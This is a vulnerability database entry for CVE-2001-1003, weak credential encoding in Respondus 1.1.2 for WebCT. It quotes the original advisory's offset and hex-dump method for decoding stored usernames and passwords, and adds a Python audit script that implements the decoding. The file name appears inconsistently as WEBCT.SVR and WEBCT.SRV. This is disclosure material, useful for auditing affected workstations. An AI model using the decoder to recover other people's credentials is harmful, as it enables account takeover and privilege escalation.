WebCT Respondus Password Disclosure and Privilege Escalation Vulnerability

Vulnerability ID: 1106474
Vulnerability type: Unknown
Published: 2001-08-23
Updated: 2001-08-31
CVE ID: CVE-2001-1003
CNNVD-ID: CNNVD-200108-169
Platform: Multiple
CVSS score: 4.6
|Vulnerability sources
https://www.exploit-db.com/exploits/21078
https://www.securityfocus.com/bid/89114
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-169
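|Vulnerability details
Respondus 1.1.2 for WebCT uses weak encryption when storing usernames and passwords. A local user who can read the WEBCT.SVR file can exploit this to decode them and gain additional privileges.
|Exploit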
source: http://www.securityfocus.com/bid/3228/info

Respondus is an application designed to add functionality to WebCT's quiz, self-test and survey tools. WebCT is a commercial e-learning solution.

When a user opts to have Respondus remember the username/password for WebCT access, the information is saved encrypted in a file called 'WEBCT.SRV'. Each character of the username and password is converted to its ASCII value and added to a constant. A hex editor can be used to compare the file before credentials are saved with the file after credentials are saved. The username/password values are recovered by subtracting the constants found in 'WEBCT.SRV' before the credentials were saved from the new values.

The constants are the same for every version of Respondus and are easily located, which may allow the attacker to forego the step of comparing the old and new versions of 'WEBCT.SRV', if the constants are known.

Successful exploitation of this issue will allow the attacker to access other WebCT accounts, which may lead to elevated privileges or the disclosure of sensitive information. 

C8-EF = userid
F0-117 = password

To see the password in plain text subtract the value shown in the WEBCT.SVR
file with no info saved from the value in the same position in the file
with the info saved. Stop when you reach the point where the values are
equal and the result is therefore 0.

i.e.

(the values after username is remembered:)
C8-EF 8B 88 7C 88 7A 7B 12 0D 13 0E 14 0F 15 10 16 11 17 12 11 13 12 14 13 15 14 16 15 17 16 0D 17 0E 11 0F 12 10 13 11 14 12
(the constants:)
C8-EF 16 15 17 16 11 17 12 0D 13 0E 14 0F 15 10 16 11 17 12 11 13 12 14 13 15 14 16 15 17 16 0D 17 0E 11 0F 12 10 13 11 14 12
75 73 65 72 69 64 0 <- stop
u s e r i d

(the values after the password is saved:)
F0-117 85 74 89 87 8E 84 83 7A 12 17 13 0D 14 0E 15 0F 16 10 17 11 11 12 12 13 13 14 14 15 15 16 16 17 17 0D 11 0E 12 0F 13 10
(the constants:)
F0-117 15 13 16 14 17 15 11 16 12 17 13 0D 14 0E 15 0F 16 10 17 11 11 12 12 13 13 14 14 15 15 16 16 17 17 0D 11 0E 12 0F 13 10
70 61 73 73 77 6F 72 64 0 <- stop
p a s s w o r d
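
For an administrator checking whether a workstation's file still holds remembered credentials, the comparison above can be automated. This is an added example, not code from the original advisory; it assumes "C8-EF" and "F0-117" are hex file offsets, takes the constants from the dump above, and uses a constructed sample image built from the page's "after saving" bytes.

```python
# Added example. Offsets and byte values are copied from the dump above;
# treating "C8-EF" / "F0-117" as hex file offsets is an assumption.
FIELDS = {  # field -> (start offset, bytes present when nothing is saved)
    "userid": (0xC8, bytes.fromhex(
        "16 15 17 16 11 17 12 0D 13 0E 14 0F 15 10 16 11 17 12 11 13 "
        "12 14 13 15 14 16 15 17 16 0D 17 0E 11 0F 12 10 13 11 14 12")),
    "password": (0xF0, bytes.fromhex(
        "15 13 16 14 17 15 11 16 12 17 13 0D 14 0E 15 0F 16 10 17 11 "
        "11 12 12 13 13 14 14 15 15 16 16 17 17 0D 11 0E 12 0F 13 10")),
}


def recover(stored: bytes, baseline: bytes) -> str:
    """Subtract the baseline per position; stop at the first zero difference."""
    chars = []
    for s, c in zip(stored, baseline):
        diff = (s - c) & 0xFF
        if diff == 0:          # stored byte equals the constant: end of field
            break
        chars.append(chr(diff))
    return "".join(chars)


def audit(image: bytes) -> dict:
    """Return {field: recoverable length}; non-zero means a saved credential
    is exposed to anyone who can read the file."""
    report = {}
    for name, (offset, baseline) in FIELDS.items():
        stored = image[offset:offset + len(baseline)]
        report[name] = len(recover(stored, baseline))
    return report


def sample_image() -> bytes:
    """Constructed image: zero padding plus the page's 'after saving' bytes."""
    img = bytearray(0x118)
    img[0xC8:0xF0] = bytes.fromhex("8B 88 7C 88 7A 7B") + FIELDS["userid"][1][6:]
    img[0xF0:0x118] = (bytes.fromhex("85 74 89 87 8E 84 83 7A")
                       + FIELDS["password"][1][8:])
    return bytes(img)


if __name__ == "__main__":
    # Report only field lengths, not the recovered values.
    print(audit(sample_image()))
```

A non-zero length for either field means the "remember" option was used and the file should be treated as holding a plaintext-equivalent credential.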
|Affected products
WebCT Respondus 1.1.2
|References

Source: BUGTRAQ
Name: 20010823 Respondus v1.1.2 stores passwords using weak encryption
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=99859557930285&w=2
